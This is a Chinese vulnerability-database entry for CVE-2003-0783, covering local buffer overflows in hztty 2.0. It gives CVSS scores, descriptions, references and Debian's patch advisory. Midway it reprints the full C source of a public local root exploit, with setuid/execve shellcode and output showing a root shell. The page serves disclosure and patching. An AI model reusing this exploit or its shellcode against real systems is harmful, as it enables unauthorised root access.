CVE-2003-0783
CVSS7.2
发布时间 :2003-10-06 00:00:00
修订时间 :2016-10-17 22:37:24
NMCOEPS    

[原文]Multiple buffer overflows in hztty 2.0 allow local users to gain root privileges.


[CNNVD]Debian hztty本地缓冲区溢出漏洞(CNNVD-200310-006)

        
        hztty是一款在终端会话中转化中文字符编码的程序。
        hztty存在多个缓冲区溢出,本地攻击者利用这个漏洞提升权限。
        hztty由于缺少正确的边界缓冲区检查,攻击者可以提交恶意参数可能以ROOT进程权限在系统上执行任意指令。此外此程序默认安装属性不正确,一般只需要以utmp组权限安装即可。
        

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0783
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0783
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200310-006
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=106424495804417&w=2
(UNKNOWN)  BUGTRAQ  20030921 Fw: 0x333hztty => hztty 2.0 local root exploit
http://securitytracker.com/id?1007756
(UNKNOWN)  SECTRACK  1007756
http://securitytracker.com/id?1007757
(UNKNOWN)  SECTRACK  1007757
http://www.debian.org/security/2003/dsa-385
(VENDOR_ADVISORY)  DEBIAN  DSA-385
http://www.securityfocus.com/bid/8656
(VENDOR_ADVISORY)  BID  8656
http://xforce.iss.net/xforce/xfdb/13243
(UNKNOWN)  XF  hztty-bo(13243)

- 漏洞信息

Debian hztty本地缓冲区溢出漏洞
高危 边界条件错误
2003-10-06 00:00:00 2006-08-31 00:00:00
本地  
        
        hztty是一款在终端会话中转化中文字符编码的程序。
        hztty存在多个缓冲区溢出,本地攻击者利用这个漏洞提升权限。
        hztty由于缺少正确的边界缓冲区检查,攻击者可以提交恶意参数可能以ROOT进程权限在系统上执行任意指令。此外此程序默认安装属性不正确,一般只需要以utmp组权限安装即可。
        

- 公告与补丁

        厂商补丁:
        Debian
        ------
        
        http://www.debian.org/security/2003/dsa-385

- 漏洞信息 (104)

hztty 2.0 Local root exploit (Tested on Red Hat 9.0) (EDBID:104)
linux local
2003-09-21 Verified
0 c0wboy
N/A [点击下载]
/*  0x333hztty => hztty 2.0 local root exploit
 *
 *
 *	more info : Debian Security Advisory DSA 385-1
 *
 *	*note* I adjusted some part of hztty's code since
 *	there were some errors. hope this will not influence
 *	exploitation :> tested against Red Hat 9.0 :
 *
 * [c0wboy@0x333 c0wboy]$ gcc 0x333hztty.c -o k
 * [c0wboy@0x333 c0wboy]$ ./k
 *
 *  ---  local root exploit for hztty 2.0  ---
 *  ---  coded by c0wboy ~ 0x33  ---
 * 
 * sh-2.05b# [./hztty started]  [using /dev/ttyp6]
 * sh-2.05b$ sh-2.05b# uid=0(root) gid=0(root) groups=500(c0wboy)
 * sh-2.05b#
 *
 *  coded by c0wboy 
 *
 *  (c) 0x333 Outsiders Security Labs
 *
 */

#include <stdio.h>
#include <unistd.h>

#define BIN    "./hztty"
#define SIZE   272


unsigned char shellcode[] =
	"\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb\x89\xd8"
	"\xb0\x2e\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68"
	"\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31"
	"\xd2\xb0\x0b\xcd\x80" ;

int main()
{
	int i;
	char out[SIZE];
	char *own[] = { shellcode, 0x0 };

	int *hztty = (int *)(out);
	int ret = 0xbffffffa - strlen(BIN) - strlen(shellcode);

	for (i=0 ; i<SIZE-1 ; i+=4)
		*hztty++ = ret;

	hztty = 0x0;

	fprintf (stdout, "\n ---  local root exploit for hztty 2.0  ---\n");
	fprintf (stdout, " ---  coded by c0wboy ~ www.0x333.org   ---\n\n");

	execle (BIN, BIN, "-I", out, 0x0, own, 0x0);
}


// milw0rm.com [2003-09-21]
		

- 漏洞信息 (F31675)

0x333hztty.c (PacketStormID:F31675)
2003-09-21 00:00:00
Cowboy,0x333  0x333.org
exploit,overflow,local,root
CVE-2003-0783
[点击下载]

Local root exploit for hztty 2.0 that makes use of the buffer overflows discovered by Jens Steube.

- 漏洞信息

7119
hztty Multiple Local Overflows
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2003-09-21 Unknow
Unknow Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Debian hztty Multiple Buffer Overflow Vulnerabilities
Boundary Condition Error 8656
No Yes
2003-09-19 12:00:00 2006-09-05 10:13:00
The disclosure of these issue have been credited to Jens Steube.

- 受影响的程序版本

Debian hztty 2.0 -5.2
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0

- 漏洞讨论

Multiple buffer-overflow vulnerabilities occur in Debian's hztty program. These issues may allow an attacker to gain unauthorized access to a vulnerable host. The issues occur because the utility fails to do sufficient boundary checking.

Successful exploitation of these issue may allow an attacker to execute arbitrary code in the context of the user who is running the vulnerable software.

Version 2.0-5.2 of hztty has been reported vulnerable; other versions may be affected as well.

- 漏洞利用

The following exploit has been released:

- 解决方案

Debian has released an advisory (DSA 385-1) and fixes to address this issue. Please see the referenced advisory for details.


Debian hztty 2.0 -5.2

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站